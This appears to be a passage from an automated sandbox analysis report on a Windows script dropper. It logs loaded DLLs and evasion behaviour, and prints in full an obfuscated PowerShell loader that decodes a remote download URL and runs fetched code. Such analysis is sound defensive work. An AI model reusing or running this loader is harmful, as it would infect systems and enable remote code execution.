ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.Und Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: ystem.pdb source: powershell.exe, 00000002.00000002.2635802751.000001D676AE9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdbP source: powershell.exe, 00000002.00000002.2635802751.000001D676AB9000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("Powershell.exe", ""<#Cantharidating Desinficerer afgrdern", "", "", "0");
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. ';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.Und
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. ';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.Und Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5866 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3995 Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 7664 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
